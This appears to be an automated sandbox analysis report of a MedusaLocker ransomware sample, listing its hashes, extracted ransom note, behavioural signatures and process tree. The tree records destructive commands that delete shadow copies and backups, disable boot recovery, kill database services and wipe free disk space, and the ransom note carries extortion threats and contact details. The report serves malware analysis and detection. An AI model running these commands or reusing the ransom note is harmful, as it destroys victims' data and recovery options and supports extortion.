Analysis

  • max time kernel
    149s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240708-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    14-08-2024 11:01

General

  • Target

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe

  • Size

    422KB

  • MD5

    f736ee661d70a5d7aa322f017e04b1d2

  • SHA1

    eee99e6b7c58ecc95c75cd52eb7ac02d812c1a54

  • SHA256

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679

  • SHA512

    23ff1b49955354a9a882ca2fd884157f75d937f00be2928acebab2a01fddcd018159cfd85df0e890cb2ecc0e40e6a02be926db29418928b320517ea6b538c8b8

  • SSDEEP

    6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb

Malware Config

Extracted

Path

C:\How_to_back_files.html

Family

medusalocker

Ransom Note
Your personal ID: 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 /!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\ All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. Contact us for price and get decryption software. email: [email protected] [email protected] * To contact us, create a new free email account on the site: protonmail.com IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. * Tor-chat to always be in touch: qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion

Signatures

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (186) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 26 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 5 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
        "C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2068
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:264
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
            4⤵
              PID:3060
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1428
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2928
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2248
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2824
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2924
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2788
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3040
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3032
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2792
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1104
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2620
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2696
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
                PID:2384
                • C:\Windows\system32\taskkill.exe
                  taskkill -f -im sqlceip.exe
                  5⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1224
            • C:\Windows\SysWOW64\cmd.exe
              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1948
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
                4⤵
                  PID:2892
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdlauncher.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2040
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1772
                • C:\Windows\system32\cmd.exe
                  C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                  4⤵
                    PID:1272
                    • C:\Windows\system32\taskkill.exe
                      taskkill -f -im Ssms.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2960
                • C:\Windows\SysWOW64\cmd.exe
                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1752
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                    4⤵
                      PID:1192
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im SQLAGENT.EXE
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:620
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:288
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                      4⤵
                        PID:1964
                        • C:\Windows\system32\taskkill.exe
                          taskkill -f -im fdhost.exe
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2072
                    • C:\Windows\SysWOW64\cmd.exe
                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2512
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                        4⤵
                          PID:1668
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -im ReportingServicesService.exe
                            5⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2084
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1252
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                          4⤵
                            PID:1904
                            • C:\Windows\system32\taskkill.exe
                              taskkill -f -im msftesql.exe
                              5⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1032
                        • C:\Windows\SysWOW64\cmd.exe
                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1624
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            4⤵
                              PID:2804
                              • C:\Windows\system32\taskkill.exe
                                taskkill -f -im pg_ctl.exe
                                5⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2292
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1312
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                              4⤵
                                PID:1548
                                • C:\Windows\system32\taskkill.exe
                                  taskkill -f -impostgres.exe
                                  5⤵
                                  • Kills process with taskkill
                                  PID:1800
                            • C:\Windows\SysWOW64\cmd.exe
                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                4⤵
                                  PID:872
                                  • C:\Windows\system32\net.exe
                                    net stop MSSQLServerADHelper100
                                    5⤵
                                      PID:1860
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                        6⤵
                                          PID:1644
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2392
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                      4⤵
                                        PID:1980
                                        • C:\Windows\system32\net.exe
                                          net stop MSSQL$ISARS
                                          5⤵
                                            PID:2488
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop MSSQL$ISARS
                                              6⤵
                                                PID:848
                                        • C:\Windows\SysWOW64\cmd.exe
                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1016
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                            4⤵
                                              PID:1472
                                              • C:\Windows\system32\net.exe
                                                net stop MSSQL$MSFW
                                                5⤵
                                                  PID:2164
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop MSSQL$MSFW
                                                    6⤵
                                                      PID:2456
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2484
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                  4⤵
                                                    PID:1712
                                                    • C:\Windows\system32\net.exe
                                                      net stop SQLAgent$ISARS
                                                      5⤵
                                                        PID:2156
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                          6⤵
                                                            PID:2404
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2280
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                        4⤵
                                                          PID:2424
                                                          • C:\Windows\system32\net.exe
                                                            net stop SQLAgent$MSFW
                                                            5⤵
                                                              PID:1700
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                6⤵
                                                                  PID:1660
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1000
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                              4⤵
                                                                PID:2116
                                                                • C:\Windows\system32\net.exe
                                                                  net stop SQLBrowser
                                                                  5⤵
                                                                    PID:804
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop SQLBrowser
                                                                      6⤵
                                                                        PID:680
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2124
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                    4⤵
                                                                      PID:1804
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop REportServer$ISARS
                                                                        5⤵
                                                                          PID:888
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop REportServer$ISARS
                                                                            6⤵
                                                                              PID:1260
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2036
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                          4⤵
                                                                            PID:2364
                                                                            • C:\Windows\system32\net.exe
                                                                              net stop SQLWriter
                                                                              5⤵
                                                                                PID:2444
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop SQLWriter
                                                                                  6⤵
                                                                                    PID:1520
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2192
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                4⤵
                                                                                  PID:2644
                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                    vssadmin.exe Delete Shadows /All /Quiet
                                                                                    5⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:2264
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1656
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                  4⤵
                                                                                    PID:2744
                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                      wbadmin delete backup -keepVersion:0 -quiet
                                                                                      5⤵
                                                                                      • Deletes system backups
                                                                                      PID:1884
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1504
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
        4⤵
        PID:3056
        • C:\Windows\system32\wbadmin.exe
          wbadmin DELETE SYSTEMSTATEBACKUP
          5⤵
          • Deletes System State backups
          • Drops file in Windows directory
          PID:2760
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1996
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        4⤵
        PID:2916
        • C:\Windows\system32\wbadmin.exe
          wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
          5⤵
          PID:1128
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      3⤵
      • System Location Discovery: System Language Discovery
      PID:3060
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        4⤵
        PID:2840
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic.exe SHADOWCOPY /nointeractive
          5⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3004
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2708
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
        4⤵
        PID:2496
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} recoverynabled No
          5⤵
          • Modifies boot configuration data using bcdedit
          PID:1912
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1940
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        4⤵
        PID:2836
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          5⤵
          • Modifies boot configuration data using bcdedit
          PID:1908
    • C:\Windows\system32\cipher.exe
      cipher /w:\\?\A:
      3⤵
      • Enumerates connected drives
      PID:3008
    • C:\Windows\system32\cipher.exe
      cipher /w:\\?\C:
      3⤵
      PID:1124
    • C:\Windows\system32\cipher.exe
      cipher /w:\\?\F:
      3⤵
      • Enumerates connected drives
      PID:2628
  • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
    \\?\C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -network
    2⤵
    • Adds Run key to start application
    PID:2824
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    2⤵
    PID:792
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\How_to_back_files.html
    2⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1932
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1932 CREDAT:275457 /prefetch:2
      3⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:760
• C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  1⤵
  • Suspicious use of AdjustPrivilegeToken
  PID:2632

Downloads

• C:\How_to_back_files.html
  Filesize: 5KB
  MD5:    07264aa79c9c80b7e6cd8a14b12aa40d
  SHA1:   61dfd4f27cdc2d182e77a7676ec2395dc8730542
  SHA256: c9fac645f65fd4583f29e2ac1831ad45472a139e4d19d6c3ea2d97d3237155a9
  SHA512: 49a6e7c30c230aaa3313df18ee0e7b5e6a129728a8697cf846e942878d2655bfe4ac198fd6cb8b7400ec461bcfb239fb93a1430a2874eaba919e8678ac4a581a

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    7d34816fcaf8524fd8ddcb71d216dacd
  SHA1:   e56e56d3a43f2eb3ed49ad94cf3c9bd4aa63343b
  SHA256: 891c48d6f1060a81449e4745a8838dc00d1d86d0188631b8b5a06374878caf81
  SHA512: 29d3b0aae5f73406f69e53319cf506d345d12a5bcfb0c1b4f1cbbd9e93d4828a87668aa9e8a05f76992d92256820a1229c73d58a85e1533a3d55768a15391310

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    f5f05f9cc522a7095131826eb5a99a0a
  SHA1:   91244129046920a19356c277050ec74dedd81176
  SHA256: f6e9ec49c8d415eb190c6c9cf17a44910c54b9f95013a2be47d6ed2dbf4dc8d1
  SHA512: cfb4e6c891f83f578c4823874e6ab233fb9403a7677c8f110fc9a281f5a86fcb2d7a9c465f623dd073505708c3430d9b93de5cd102f3b2d0bc03d644e7a7d170

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    74c482cb984b5ca0d96cb6af62d4cfb5
  SHA1:   8e58afefd83efbba71bbbe9707848248492a06d8
  SHA256: 618a21120104e3ecb566949c055d7605b676df59abde84e2f3bc3271a00efbd3
  SHA512: 7b4fb08e31e49d26a90d00461fe7f1cb66945efb319e7e9dd1483de02f11e224d8b6ca54cfef29d225b2ce5f4adbc6812782006f47650ddc3887c1ea61ddbcc3

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    f685fb81bfab313c9875ca5a24ea4ec7
  SHA1:   7254edd093c80416f1daef8ed5ebd84e2757bd66
  SHA256: ab44a4d0d6fbdca75027787bd92422bf1d99c82db362765b2adb1a47dee7007d
  SHA512: 2001bfcc98f56a3f6d91015ca9d40112d4f42e9d2c478c4183312f65415dd3a26c6243f359c272e3b54e0b4aa7532dd8f8a404aaef0225e25723a6699473fe8e

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    1f611f72d020461db6ef355e0f5621a0
  SHA1:   a81346e0e0f11510c96b7d0206e0290db9a2d1ae
  SHA256: d401a60d5005abb108d37c7d6886b458997e02d1533ab95fbb6285c0bf3fff0f
  SHA512: 5c1efb85fc24ba492be7e8478c6a45d3a76eec3be096341c8742cf112818815efc9a67481095c11fb4c6d2e09be704a28cebb4d804f158031d12c940cefd3111

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5:    e0a1b4c7cc003115661f569660fcedf2
  SHA1:   fd6f76c47bb8c4d35cb9c7d02433963652ae6a8f
  SHA256: 2da50fb0e6bcbc7a24400eb9a563d6e9a44f962d13820da942237c7a5d5cf49e
  SHA512: b79bf45481b92abbb75b4851c1fa52126d07c2b3971f86086958d5b7d1e334c72e721354cd6b70fe6189d16e05fa88be45210b67eb0fdb7a7e16c153d415dd71

• C:\Users\Admin\AppData\Local\Temp\Cab5016.tmp
  Filesize: 70KB
  MD5:    49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1:   1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

• C:\Users\Admin\AppData\Local\Temp\Tar5067.tmp
  Filesize: 181KB
  MD5:    4ea6026cf93ec6338144661bf1202cd1
  SHA1:   a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b